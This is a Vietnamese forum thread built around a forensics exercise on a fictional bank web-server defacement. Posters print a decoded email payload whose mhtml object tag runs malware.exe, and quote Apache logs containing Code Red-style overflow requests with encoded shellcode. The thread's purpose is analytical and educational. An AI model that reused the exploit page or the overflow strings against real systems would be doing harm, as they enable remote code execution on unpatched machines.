xem log file chắc chắn sẽ xác định được IP của kẻ tấn công, hehe tại vì một lỗi rất thường gặp phải của các defacer: luôn là người đầu tiên access vào xem "tác phẩm" của mình.
àh thêm một tí, máy của admin nằm chung với 40 máy con trong cái Intranet, máy này luôn được mở 24/24 ?

Một CCIE Routing&Switching chưa chắc là giỏi về Security. Và mức Security dạy trong trình độ CCIE security cũng chỉ dừng lại ở các loại tấn công, config firewall (Dedicated or IOS based), các loại IDS - là nhiều lắm rồi.

Trí có thể post 3 cái :

Vì Trọng là CCIE, vậy sure là hệ thống chạy Cisco rồi. Trí cho mình biết rỏ :

- Gateway Router là gì ? Có config hay không ?
- Firewall ở đây là gì ? Có config hay không ?
- Trong hệ thống lớn như thế, không có cái IDS ?

Vị trí của máy của Trọng trong hệ thống ? Máy của trọng nằm chung vùng DMZ với Webserver hay trong Internal ? Máy của Trọng cài chương trình gì ? IE version mấy ? Security của IE set ra sao ? Java/VBscript are allowed ?

Bài viết được gửi bởi mRrO
Hacker luôn là người đầu tiên access vào xem "tác phẩm" của mình.


Good :D.

1. trihuynh kể chuyện CÓ NỘI DUNG THỜI THƯỢNG hay lắm, bái phục, tối kể chuyện cho con nghe đùng có kể mấy chuyện này nghe cha ?!?!?!

2. Việc suy luận ra ai là thủ phạm tui không dám bàn vì tui không phải là xơ-lôc-hôm. Người có lỗi trong vụ này LÀ NGƯỜI KHÔNG THẬN TRỌNG KHI NHẬN MAIL CÓ ATTACK. Nếu có suy nghĩ như Trọng nghĩ thì nên bắt anh chàng đi học thêm một lớp CĂN BẢN về security.

3. Cách khắc phục thì rất dễ vì chỉ cần ngồi trên web-server là xong. Khắc phục ... hậu quả của nó mới thành vấn đề.

4. Các bạn thử tìm hiểu kỹ cái mail trihuynh gởi kèm, rất là thú vị đấy, phải không tride@ ... dô dô dô àlê alế àlê .....

achxi@

Hix, Malware.exe <--F***,

Để Decode típ

P/S: Nếu thật sự có bằng CCIE mà được mấy em thơm như múi mít mê như trihuynh kể thì tui cũng ráng một phen cho khỏi uổng kiếp người quá ...

hehehe
achxi@

<title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:\malware.html!file:///malware.exe"></object>

Bài viết được gửi bởi yuna_admirer
<title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:\malware.html!file:///malware.exe"></object>

Cái gì đây anh Trí ?

Admin gì mà, go to hell :D

Bài viết được gửi bởi yuna_admirer
Cái gì đây anh Trí ?

Admin gì mà, go to hell :D

Tham khảo http://www.malware.com/

Chào các bạn,

Lỗi liên quan đến windows help đã được Microsoft fix lâu rồi. Vấn đề ở đây là nằm ở máy Trọng (hoặc Hùng) ngồi hàng ngày ;)

PS: Microsoft vừa ra lò win2k service pack 4 (129MB) , bà con mau down về đi.

Thân,
Rain

Trước hết vì AABANK là một ngân hàng lớn mà cho nên không thể để tình trạng webserver như thế được, backup lại database ,reset lại pass ,kiểm tra backdoor trên server, manh mối quan trọng bây giờ là lá mail và logs files.

Đây là cái phần quan trọng trong nội dung mail đã được gửi đến cho Trọng nhìn kĩ mail ta thấy được mã hoá theo dạng Base64
ok thế thì decode ra sẽ cho ta các thông tin rất thú vị như sau

<!-- 25.02.03 - http://www.malware.com -->

<title>malware.com</title>
<body bgcolor=black scroll=no>

<SCRIPT>
//25.02.03 - http://www.malware.com
function malware()
{
s=document.URL;
path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>malware.com</title>
<body scroll=no bgcolor=black>
<FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center>
<object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\malware.html!file:///malware.exe"></object>')}
setTimeout("malware()",150)
</script>

Rõ ràng là Trọng đã quá bất cẩn, đối với 1 mail như vậy.
tìm và diệt ngay spy trên máy của trọng, sau khi WebServer đã hoạt động bình thường nên check và so sánh thật kĩ logfile trưóc đó và sau đó
nhất định hắn sẽ quay lại xem thôi
trước mắt có thể suy đoán hắn không thể tấn công trực tiếp vào webserver nên mới dùng send mail như vậy

Nhưng : theo Maxx mình nên giăng bẫy lại hắn hehe
sau khi set lại server mình lại để password y như cũ
và check logs file xem các lần access vào server
hehe hắn cũng là người thôi thế nào cũng để lại dấu vết :)

chời. :D

Xem trong Log của CiscoWork2000 là thấy đứa nào gởi mail vô rồi, chi cho mất công vậy Maxx ?:D

Sory đó giờ chưa biết cái CiscoWork chòn méo ra sao ??
hehe

tôi nghĩ nên sử dụng secure id card trước khi access vào monitor hay admin hệ thống thì an toàn hơn. Vì ngay cả máy bạn gặp vấn đề trong khi bạn giao tiếp với bên ngoài hay nội bộ , thì người ta vẫn không thể lợi dụng cái "what you know" như pass để xâm nhập hệ thống chính mà còn phải có cái "what you have" như SID card mà chắc chắn bạn giử gìn cẩn thận rồi ...

Chào bạn,

Bạn $$$ có thể post lên đây một vài mô hình, giải pháp v.v... về SID card cho mọi người tham khảo được không ? Tôi từ trước đến giờ chỉ dùng đến IPSec trên nền Win2k hoặc GPG chứ chưa bao giờ sờ đến 1 cái "thẻ an ninh" xem nó thế nào :D

Thân,
Rain

ối trời , chỉ có 1 cái WS bị hack thôi mà có bnao nhiêu là vấn đề, decode mail, SID, log, ... rồi cả chuyện tình củm nữa. Vấn đề là cái ông Trí đó post bài mà có ít chi tiết quá nên làm bà con đoán già đóan non. nếu bà con là Trọng thì bà con sẽ làm gìm trình tự như thế nào ? đó mới là quan trọng . Ngồi đó đoán thì chắc tới già mất ! Cha nội Trí này chuyên chơi mấy cái trò như vầy ( phải không Trí , tui học với ông mấy năm cũng hiểu không ít thì nhiều mà) @

PS : dù sao thì cái kiểu kể tình huống như Trí tìh cũng ... sướng thiệt. Tui cũng muốn có vài cô như bạn gái của Trọng , hê hê hê

40 workstation thuộc private zone nên chắc chắn sẽ mang IP "ba láp". Chẵng có thằng hacker nào ngu tới mức tìm đường vô đến NOC đâu mà HACK vô WS mấy bạn ơi.

Chiêu ... được thực hiện rất hoàn hảo, mời các bạn đã "ngâm cứu" bước 1 tiến hành "ngâm cứu" kỹ hơn bước 2 đi ...

dô dô dô àlê alế àlê

achxi@

P/S: Có ai dính con sefex khi thử cái mail chưa vậy ?

Gúc lại là rỏ ràng trong cái Forward Email có đính kèm đoạn code HTML gọi cái malware.

Anh Trí post cái log của Apache lên đi. Lúc đó sẽ biết được ai đã xâm nhập vào đây.

Biết được ngọn nguồn nguyên nhân rồi, fix cũng dể thôi, làm như Maxx cũng được.

80.95.104.209 - - [29/Jun/2003:11:27:06 -0800] "GET / HTTP/1.1" 200 1494
80.95.104.209 - - [29/Jun/2003:11:27:06 -0800] "GET /apache_pb.gif HTTP/1.1" 200 2326
80.95.104.209 - - [29/Jun/2003:15:53:58 -0800] "GET / HTTP/1.1" 200 1494
80.95.104.209 - - [29/Jun/2003:15:53:58 -0800] "GET /apache_pb.gif HTTP/1.1" 200 2326
80.95.104.209 - - [29/Jun/2003:15:54:10 -0800] "GET /index.htm HTTP/1.1" 404 291
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /index.htm HTTP/1.1" 200 7588
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /images/bkgrnd.gif HTTP/1.1" 200 166
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /images/logo.gif HTTP/1.1" 200 2366
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /images/globe.gif HTTP/1.1" 200 1222
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /images/spacer.gif HTTP/1.1" 200 61
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /images/blueglobe.jpg HTTP/1.1" 200 13878
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /images/header.gif HTTP/1.1" 200 5208
80.95.104.209 - - [29/Jun/2003:15:57:45 -0800] "GET /images/yellow_bars.gif HTTP/1.1" 200 534
80.95.104.209 - - [29/Jun/2003:15:57:47 -0800] "GET /contact.htm HTTP/1.1" 200 6460
80.95.104.209 - - [29/Jun/2003:15:57:48 -0800] "GET /images/test24.jpg HTTP/1.1" 200 9336
80.95.104.209 - - [29/Jun/2003:15:57:50 -0800] "GET /services.htm HTTP/1.1" 200 5859
80.95.104.209 - - [29/Jun/2003:15:57:50 -0800] "GET /images/test20.jpg HTTP/1.1" 200 8965
80.95.104.209 - - [29/Jun/2003:15:57:52 -0800] "GET /Aplus.htm HTTP/1.1" 200 7520
80.95.104.209 - - [29/Jun/2003:15:57:52 -0800] "GET /images/contact1.jpg HTTP/1.1" 200 9043
80.95.104.209 - - [29/Jun/2003:15:57:55 -0800] "GET /ccna.htm HTTP/1.1" 200 8307
80.95.104.209 - - [29/Jun/2003:15:57:55 -0800] "GET /images/button-go.gif HTTP/1.1" 200 225
80.95.104.209 - - [29/Jun/2003:15:57:56 -0800] "GET /join.htm HTTP/1.1" 404 290
80.95.104.209 - - [29/Jun/2003:15:58:00 -0800] "GET /partner.htm HTTP/1.1" 200 6421
80.95.104.209 - - [29/Jun/2003:15:58:00 -0800] "GET /images/test26.jpg HTTP/1.1" 200 8086
80.95.104.209 - - [29/Jun/2003:15:58:00 -0800] "GET /images/logo2.gif HTTP/1.1" 200 6735
80.95.104.209 - - [29/Jun/2003:15:58:00 -0800] "GET /images/logo3.gif HTTP/1.1" 200 2452
80.95.104.209 - - [29/Jun/2003:15:58:00 -0800] "GET /images/logo4.gif HTTP/1.1" 200 1638
80.95.104.209 - - [29/Jun/2003:15:58:10 -0800] "GET /index.html HTTP/1.1" 200 1494
80.95.104.209 - - [29/Jun/2003:15:58:17 -0800] "GET /index.html HTTP/1.1" 200 1494
80.95.104.209 - - [29/Jun/2003:15:59:34 -0800] "GET / HTTP/1.1" 200 7588
213.92.45.3 - - [29/Jun/2003:15:59:36 -0800] "GET /index.html HTTP/1.1" 200 7588
213.92.45.3 - - [29/Jun/2003:16:00:20 -0800] "GET /join.htm HTTP/1.1" 404 290
213.92.45.3 - - [29/Jun/2003:16:00:26 -0800] "GET /join.htm HTTP/1.1" 404 290
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET / HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET /images/logo.gif HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET /images/bkgrnd.gif HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET /images/header.gif HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET /images/yellow_bars.gif HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET /images/globe.gif HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET /images/spacer.gif HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:08 -0800] "GET /images/blueglobe.jpg HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:14 -0800] "GET /Aplus.htm HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:14 -0800] "GET /images/contact1.jpg HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:15 -0800] "GET /ccna.htm HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:15 -0800] "GET /images/button-go.gif HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:39 -0800] "GET /partner.htm HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:39 -0800] "GET /images/test26.jpg HTTP/1.1" 304 -
213.92.45.3 - - [29/Jun/2003:16:01:39 -0800] "GET /images/logo2.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:16:01:39 -0800] "GET /images/logo4.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:16:01:39 -0800] "GET /images/logo3.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET / HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET /images/bkgrnd.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET /images/logo.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET /images/header.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET /images/yellow_bars.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET /images/globe.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET /images/spacer.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:46 -0800] "GET /images/blueglobe.jpg HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:56 -0800] "GET /services.htm HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:56 -0800] "GET /images/test20.jpg HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:13:58 -0800] "GET /Aplus.htm HTTP/1.1" 200 7522
10.0.0.7 - - [29/Jun/2003:19:13:58 -0800] "GET /images/contact1.jpg HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:14:02 -0800] "GET /ccna.htm HTTP/1.1" 200 8308
10.0.0.7 - - [29/Jun/2003:19:14:02 -0800] "GET /images/button-go.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:14:53 -0800] "GET /join.htm HTTP/1.1" 404 290
10.0.0.7 - - [29/Jun/2003:19:15:01 -0800] "GET /contact.htm HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:15:01 -0800] "GET /images/test24.jpg HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:15:04 -0800] "GET /partner.htm HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:15:05 -0800] "GET /images/logo2.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:15:05 -0800] "GET /images/test26.jpg HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:15:05 -0800] "GET /images/logo3.gif HTTP/1.1" 304 -
10.0.0.7 - - [29/Jun/2003:19:15:05 -0800] "GET /images/logo4.gif HTTP/1.1" 304 -
24.61.129.47 - - [29/Jun/2003:20:45:29 -0700] "GET /.htaccess?***************************************X ************************************************XX ************************************************XX ************************************************XX *********************************X%u9090%u6858%ucb d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u 53ff%u0078%u0000%u00=a HTTP/1.0" 404 281
210.171.1.247 - - [29/Jun/2003:20:45:54 -0700] "GET / HTTP/1.0" 403 274
210.171.1.247 - - [29/Jun/2003:20:46:07 -0700] "GET /index.html HTTP/1.0" 404 280
210.171.1.247 - - [29/Jun/2003:20:47:59 -0700] "GET /index.html HTTP/1.0" 200 220002
210.171.1.247 - - [29/Jun/2003:20:49:15 -0700] "GET / HTTP/1.0" 200 220002
210.171.1.247 - - [29/Jun/2003:20:49:56 -0700] "GET /malwarez.html HTTP/1.0" 200 220005
210.171.1.247 - - [29/Jun/2003:20:50:24 -0700] "GET /malware.html HTTP/1.0" 200 284612
24.61.244.31 - - [29/Jun/2003:20:54:02 -0700] "GET /malwarez.html HTTP/1.1" 200 3103
210.171.1.247 - - [29/Jun/2003:21:04:31 -0700] "GET /malware.htm HTTP/1.0" 404 281
66.31.218.123 - - [29/Jun/2003:21:21:10 -0700] "GET / HTTP/1.1" 200 220002
24.81.206.6 - - [29/Jun/2003:21:22:26 -0700] "GET /default.ida?************************************XX ************************************************XX ************************************************XX ************************************************XX ************************************%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
210.245.27.11 - - [29/Jun/2003:21:26:49 -0700] "GET / HTTP/1.0" 200 220002
66.31.218.123 - - [29/Jun/2003:21:33:51 -0700] "GET / HTTP/1.1" 200 220177
210.171.1.247 - - [29/Jun/2003:21:34:47 -0700] "GET / HTTP/1.0" 200 220177
203.113.143.74 - - [29/Jun/2003:21:41:01 -0700] "GET / HTTP/1.1" 200 220207
210.171.1.247 - - [29/Jun/2003:21:50:35 -0700] "GET /malwarez.html HTTP/1.0" 200 3103
24.61.129.47 - - [29/Jun/2003:22:16:37 -0700] "GET /default.ida?************************************XX ************************************************XX ************************************************XX ************************************************XX ************************************%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281
24.61.168.174 - - [29/Jun/2003:22:27:53 -0700] "GET /default.ida?************************************XX ************************************************XX ************************************************XX ************************************************XX ************************************%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281
-----------------------------
Error Log file cua Apache
đạ bị hacker xóa hết không còn thông tin gì cả. :-)

First, Shameless Promotion here : Có ai ở Lowell, MA muốn đi học về Security thì liên hệ với Middle*** Technology Institute nhe. Mình rất vui nếu bạn làm vậy. :) (Hy vọng các bạn khác không nỗi giận vì quảng cáo qua lộ liễu nhu vay):cool:
-----------------------------------------

Mình rất ngạc nhiên là các bạn đã khám pha ra cái bí mật nằm trong bức email. Bây giờ bạn thử suy nghĩ xem hacker làm cách nào lọt vào web server cũng như là "wat he is planning to do nhé".

To Rain, cái bug đó không phải là cái bug ở trong help file đâu. Cái bug trong cái e-mail này vẫn còn rất là hot đó. Mình sẽ giải thích về nó sau khi practice #1 kết thúc (Minh cho rang khoảng 70 đến 80% máy sử dung MS OS bị "thủng" vi bug đó)

Mình đang viết tiếp cái Practice #2, các bạn sẽ gặp lại các nhân vật này trong vòng 2 tuần nữa và hiển nhiên mức độ phức tạp của tấn công sẽ cao hơn một chút. Mình hi vọng trong vòng 2 tuần này các chuyện gia security của DDTH sẽ giải thích được ngọn ngành vụ tấn công ngân hàng AA (Practice #1) nhé.

lol

hà hà , đúng là chẳng có thằng hacker nào ngu dại đến nỗi để dấu vết trong log cả. Tui nghĩ hắn đột nhập thông qua việc Hùng kiểm tra lại .htaccess. tui đang đợi P2 đây, hi vọng cũng hấp dẫn như P1

Giải P1 trước đi.

Em nghỉ mục tiêu hắn tấn công vào hệ thống, việc phá Web server chỉ là "hỏa mù" mà thôi. Cái hắn muốn phá chính là cái Database Oracle 9i chạy trong Intranet kia kìa. Hack cái Webserver ở DMZ giống như là một dạng "bàn đạp", có thể dùng để lấy quyền trust của Internal network, từ đó đi vào bên trong ?

Đang suy nghỉ hắn sẻ làm gì đây.

Trước khi qua Practice 2 đề nghị trihuynh viết bài hướng dẫn (công khai cho nó hấp dẫn cái box security này một chút) cách "gói bánh chưng" nhé. Còn mục khác thì để bà con sẽ "à````" một tiếng là được rồi.

achxi@

Mình sẽ gởi phần trả lời vào cuối tuần này. Tuy nhiên để coi xem có ai có ý kiến gì không( Chẳng hạn như làm cách nào hacker lọt vào webserver, Access file của apache nói lên điều gì, ý định của hacker và hắn có thật sự thành công trong vụ tấn công này khong...). Bạn silver đã nói đúng một điểm là hacker dựa vào việc Hùng vào .htacess để lọt vào webserver nhưng một cách kĩ thuật thì nó đã xảy ra như thế nào ?

Có ai có thể dựa vào các dữ kiện có sẵn (email, log file, firewall) và liên kết chúng lại để suy đoán được toàn cảnh từ việc hacker bắt đầu tấn công đến lúc web site bị thay đổi chưa ?

Một trong những kinh nghiệm của mình khi làm về computer forensic đó là mình phải tập trung vào những thông tin mình đả co, thu thập thông tin mới và quan trọng nhất đó là xây dựng một gia thiet hợp lí dựa trên các dữ liệu đó.

Bạn có thể trổ tài thám tử được rồi.

-----------------
To yuna : That is also a good point. :cool:

vậy tui sẽ nói trước . tên hacker gửi mail có backdoor cho Trọng, 90% máy của Trọng sẽ quản lý gateway. Hùng nhận được email (fake email là điều dễ dàng), kết nối vô webserver. Trong quá trình kết nối thì đồng thời Hùng cũng bị theo dõi. và việc hack vào webserver với tên hacker trên là việc "lật ngửa bàn tay" !
Cái tui nghi ngờ là nội dung email mà Hùng nhận được . Việc hacker chiếm quyền toàn bộ hệ thống và dùng account của Trọng để gửi mail cho Hùng khó xảy ra. Con malware kia chỉ là backdoor thôi. Trí post cái email kia cho bà con coi luôn nghe. Nhớ post đầy đủ header luôn đó.

à con việc file log thì nhìn qua có thể nói là hắn flood cái logger để xoá dấu vết. đó là cách làm nhanh và đỡ tốn công sức nhất. chỉ việc aaaaaaaaaaaa.... là xong. just my thought, có gì sai thì bà con chỉ bảo giùm.

Good

Ko thấy kết wá ,cũng ko thấy bài mới đâu ,mấy bác sao ko tiếp tục vậy? Đang hay mà

Hi,

À, nếu bạn thích về security thì bạn có thể tham gia cái mailing list VNSEC, là
một mailing list thảo luận về bảo mật dành cho cộng đồng người Việt. Bạn có
thể tham gia vào mailing list bằng cách gởi một mail không có nội dung (empty) với
SUBJECT là "Subscribe" (không có dấu ngoặc kép) vào vnsec-request@sentryunion.com

Đây là mailing có người coi ngo' (moderated) nên bạn sẽ không bị spam hoặc sẽ
phải nhận những e-mail có nội dung "chướng mắt". Thân

Rồi sao nữa, sao im lặng hết dzị, chủ đề hay như thế này mà...

ờ chắc tiếp tục cái này đi anh Trí đâu roài ??

hehe bỏ lâu quá rồi :D

Chào tác giả của bài pratice này.....:)
Bài này sao giống toán đố quá.....:) it's very interesting...:) but it isn't make sense.
Q không phải là hacker nên không biết nhiều về cách hack.....:) but trong cái bài này you promo cái người Admin nhiều lắm...:)
Nếu cái case này thật sự xảy ra ở ngoài đời thì Trọng ( Admin), who isn't a Network Admin....:).
Q give U 1 cái hint:
Nếu U là admin thì công việc quan trọng nhất ngày đầu tiên U nhận việc và mỗi ngày bước ra khỏi công ty là gì ???
uhm... thật sự công việc và trách nhiệm của người admin rất mệt và không thể bảo đãm an toàn tuyệt đối công việc mình nên có bị attack cũng là chuyện thường. Web server bị hack không phải là big deal....:) Trong (admin) sao sợ quá vậy....:)
Q học hỏi rất nhiều về mấy cái phân tích của các bạn trong phần này, thanks các bạn

Theo em nghĩ thì tên hacker tấn công vào chính là tay khách hàng . Nếu như một hacker muốn chôm tài khoản của người khác thông qua kỹ thuật lừ đảo thì hắn chả đính kèm backdoor làm gì . Nếu như chỉ làm hù doạ thì hắn tội gì phải viết ra 1 con backdoor mà đến "NAV được cập nhật thường xuyên" của bác admin cũng không phát hiện ra . Mặt khác nếu tay hacker gửi thư đính backdoor đến thẳng nghân hàng thì chắc chắc admin ở đó sẽ rất thận trọng thậm chí là xoá không thèm đọc nhưng nếu dưới danh nghĩa 1 khách hàng bị ai đó hù doạ thì chắc chắc admin của nghân hàng phải mở ra để kiểm tra , khi đó thì cơ hội để con backdoor phát huy tác dụng càng cao . Còn cái dzụ bác admin buổi tối nhận được e-mail của bác admin buổi sáng thì theo em nghĩ đó chỉ là chiêu hoả mù nhằm đánh lạc hướng , để chúng ta cho rằng server đã bị xâm nhập từ lúc đó nhưng thực ra tay hacker đã gài được backdoor từ lúc sáng . Trên chỉ là suy nghĩ của em , nếu không đúng thì thôi nhé .

đối với tui chỉ có ngồi xuống trước máy mới tìm ra câu trả lời được, cứ đứng đó đoán mò thì tới lúc nó tắt thở cũng chưa có tìm ra được cách trị

CCIE Trọng đã bất cẩn khi bij nhiễm backdoor Backdoor.Coreflood.dr

"Backdoor.Coreflood.dr is an HTML file containing VBScript. If a Web site has been compromised, some of its pages may contain iframe links to Backdoor.Coreflood.dr.
The dropper uses an exploit described in Microsoft Security Bulletin MS03-032 to allow execution of arbitrary code from a Web page. When the page is loaded by a browser that has not been patched against the remote execution exploit, the script creates and executes a file called malware***.exe "

Virus này Norton chỉ cập nhập vào tháng 9/2003 mà vào thời điểm đó (7/2003)
Sau khi có lối vào máy Trọng và sau đó gữi mail cho Hung không loại trừ HUNG củng bị nhiễm sau đó. Dụ Hung truy cập vào webserver và ...... Theo log file thì máy có IP nội bộ là 10.0.0.7 truy cập vào server có lẽ là máy của HUNG. 20h10 thì server đã bị hack Admin mất control nhưng sau đó 20h45 có ai đó vào xem file htaccess (24.61.129.47).
Việc HUNG tự hack mình là khó xảy ra nếu anh ta không muốn mất việc.

Nếu có html code kèm trong file thì hãy mở nó bằng text editor :).
however dùng The Bat ! bao giờ cũng an toàn hơn.
Còn cái sơ đồ bác TRIHUYNH đưa ra DMZ có vẻ nằm không đúng chỗ. vì DMZ là vùng đệm nằm giữa INtranet và Ex-net.

Hic hic , seo không thấy tác giả của topic giải đáp dzậy ?

bài viết khá hay, tiếc là giờ Hoàng mới đọc nên không thể tham gia được ;) lão TriHuynh nghĩ tiếp pratice #2 đi :D
BabyOneMoreTime : Bài này đã có lời giải rồi mà giải gì nữa ???

Hổng từ con người hổng đi, ngay bước đầu Trọng đã dính bẫy ngay khi nhận mail. Đơn giản không có cú điện thoại của khách hàng call cho Thảo phàn nàn về việc có kẻ gửi mail thông báo như vậy, Thảo lại cho email của quản trị để khách hàng trực tiếp liên hệ - sai lầm đầu tiên. Tiếp theo Trọng nhận email của khách hàng không đặt dấu hỏi nghi ngờ về bức mail có vài dòng mà dung lượng lên tới 60Kb - cái chết thứ 2. Cái chết dắt dây từ đây tới mail của Hùng chẹp chẹp sai lầm dắt dây sai lầm :p

Em chưa học về mấy cái Cisco, mấy cái DMZ gì gì đó nên không rành lắm. Nhưng nếu em là hacker thì em sẽ làm như sau: dùng con malware để gởi email cho Hùng kêu mở file .htaccess (trong mail có malware) và nhiệm vụ của malware là khi Hùng mở .htaccess sẽ auto-insert 1 dòng để tự động download backdoor về máy, sao nó không dùng malware replace luôn file .htaccess? - Bởi vì nếu tự động replace thì Hùng sẽ không bao giờ mở lại web của AABank để kiểm tra .htaccess hoạt động ra sao, như vậy thì không dính backdoor mà malware đã auto-insert (Sao biết chắc Hùng mở lại web của AABank? Vì bất cứ 1 webmaster nào sau khi edit lại thì CHÍNH MÌNH SẼ LÀ VISITOR ĐẦU TIÊN KỂ TỪ LÚC EDITED. Right? - Giống như hacker sẽ là visitor đầu tiên kể từ lúc hack :lol:).

Đây chỉ là suy đoán của em thôi. Còn sau khi dính backdoor thì hacker có lẽ đã chiếm được access của WS rồi :)

Just newbie :)